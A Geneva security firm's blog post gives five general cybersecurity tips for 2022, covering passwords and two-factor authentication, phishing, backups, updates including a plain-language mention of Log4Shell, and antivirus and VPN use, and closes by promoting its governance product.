22 rue du Mont-Blanc CH-1201 Genève

5 cybersecurity tips to start 2022

cybersécurité

What are your new year’s resolutions for 2022? We decided to give you a little help by establishing a list of 5 cybersecurity best practices. Put it in place to mitigate your risks of data theft or loss. Indeed, cybersecurity is an increasingly complex issue for organizations. In case of a cyber attack, an organization can be paralyzed for months with the consequences that this implies: business disruption, financial losses, legal fees, damage to reputation, … Cybersecurity is not only a technical subject and results from everyone’s involvement . After reading these few lines, you will no longer be an easy prey for hackers.

1) Use a long and complex password, the best safeguard in cybersecurity

Create strong passwords containing upper and lower case letters, numbers and symbols. Think of a password that has no connection to you. This way, it will be difficult to find using automated tools and impossible for a third party to guess.

We strongly advise you to regularly change your passwords because the platforms you use are not infallible. In fact, if you use an iPhone and store your passwords on iCloud Keychain, you’ve probably already seen the message: “this password has appeared in a data breach” . This is a very effective feature that appeared with iOS 14 that can tell you if you’ve been compromised. If you don’t use iCloud Keychain or are on Android, don’t worry. Head to haveibeenpwnd.com and enter the email address you usually use with your accounts to find out if it has been compromised and what information has been leaked.

Choose a different password for each site. It is essential that your passwords are not related to each other, especially when you change them. It can be convenient to re-use the beginning of a password or to create a logical construction to remember it. This is an example of construction that should be banned. If you recognize yourself in this kind of practice, you should change your passwords.

All this seems clear, but we all have an average of fifty online accounts, which makes memorizing them very complex. Instead of writing down your passwords in a notebook, we suggest you use software dedicated to this function such as Keepass. A password manager published under a free license that allows you to save a set of passwords in an encrypted database. This database file can be opened with a master password and with other authentication methods like a key file.

Finally, your banker has probably already warned you never to give your credit card code to anyone. And the same goes for your passwords. Indeed, the cybersecurity error that leads to an attack will not necessarily come from you. It could come from another person, which is less vigilant. As you can see, you should not share your password only for lack of trust, but rather because the person to whom you share it may not have read this article or may not yet apply good security practices. So if you must share your password with someone else, be sure to change it afterwards.

We can never be too careful when it comes to cybersecurity. So, we strongly recommend you to use two-factor authentication as much as possible. Today more and more tools and applications offer two-factor authentication that uses another device like your phone to better secure your account . For example, Paypal  will propose you to send a security code by SMS. This system adds an extra step to accessing your accounts. It is a way to discourage hackers.

password

2)    Beware of phishing, a dreaded cyber attack

Phishing is an entry point for a cyber attack. Keep in mind that your bank will never ask you for your login information by email or the post office will never send you an email with the following address “abzecskt@mb.mails.com” asking you to pay to unlock your mail. These are clues to help you detect phishing, but sometimes it is more difficult to identify it. It also happens that a phishing page is placed on the website of a well-known company after it has been hacked. It is important to never fill out a form on these fake sites. The use of this process is especially known in the field of online banking. So, if you have any doubts about a link, a file, etc. whether it is on social networks, by email or on the web, do not click on it. Try to contact the sender if it is a message such as the previous example to make sure of its legitimacy, or contact your IT department if you are in a company.

Phishing is the most effective and widespread method of spreading malicious code. It is important to regularly train your employees on cybersecurity issues and current practices. Indeed, an employee can put an organization at risk through lack of knowledge or by mistake. As described in the introduction, a cyber attack can have serious consequences. Since the acceleration of digitalization caused by Covid19, there is a rising number of cyber attacks. It is therefore necessary to put in place security protocols and governance to limit the risks in case of phishing.

As an IT security manager, we advise you to set up a catalog of roles and access profiles in order to avoid the accumulation of unnecessary access rights. In case of accidental modifications or intrusion, it can have a heavy impact. It is essential to assign the right permissions to allow users to access the right resources. For example, you should not use an administrator account to work or browse the web. A user access is usually sufficient and limits the risks.

3)    Make regular backups to ensure business continuity

“You must be resilient“. This is a term that we often hear in these times of crisis which takes all its meaning during a cyber attack. Resilience is the ability to overcome a shock. According to IBM security report, a company takes an average of 287 days to recover from a ransomware attack. Continuity management is crucial. We invite you to learn more about ISO 22301 standard that deals with business continuity management in a regulatory framework. Furthermore, if you are looking to implement a governance solution, we have a cockpit dedicated to this topic.

In this article, we will only talk about backup. Indeed, it is one of the best shields in cybersecurity. You will be able to react quickly when a computer attack or major malfunction occur. You will be able to protect your data and your business. By making a backup, you will always be able to recover and access your data in case of data loss or theft. We invite you to set up complete and recurrent backups. However, they must be uncoupled from your main information system. Prefer a cloud, external drive, USB key, etc.

4)   Set up updates, a guarantee of cybersecurity

Few weeks ago, you probably heard about Log4Shell flaw. This security flaw concerns a Java library named Log4j and developed by the Apache Foundation. It is a tool used to record information about a software such as error reports. Several experts have discovered that it is possible to send a link to a Web page to a server and have the library read the contents of that page. If this page contains Java code, it can then be executed on the server. According to Apache, the vulnerability affects Log4j in versions 2.0-beta9 through 2.14.1.

Therefore, we invite you to update your servers, browsers, operating systems, and software you use. These updates are useful for adding features or improving solutions as well as fixing potential cybersecurity vulnerabilities. Hackers are looking for computers with un-updated software to exploit them. we advise you to allow automatic updates of your systems and software solutions.

cybersecurity

5)  Install a VPN and an antivirus software to strengthen your protection

Your operating system usually offers a first protection such as Windows Defender or MacOs but if your device contains sensitive data and you want to strengthen your cyber security, you can install an antivirus. Other softwares such as Adwcleaner can remove spyware and adware, but an antivirus software is still the safest solution. This software detects and removes viruses. Combined with a firewall, which aims to prevent viruses from invading your computer, it offers an optimal protection. Therefore, it is important to configure your firewall properly.

Finally, with the BYOD (Bring Your Own Device) trend and the emergence of home office, it becomes essential to use a VPN (Virtual Private Network) in the company. It is a link that allows you to create a private network on public networks. Indeed, no matter where you are on earth, the VPN will allow you to have access to internet as if you were using it from Switzerland. Thus, you will protect your collaborators who are likely to work remotely on networks that may be unsecured.

As a bonus, we advise you to check your information security management system (ISMS) by having it audited regularly and by implementing a cyber governance solution like smartcockpit. whether you are an SME or a larger organization, you will be able to easily identify, protect, detect, respond to threats and bounce back quickly in case of a cyber attack thanks to business continuity plans. You can download our white paper that summarizes the principle of cyber governance.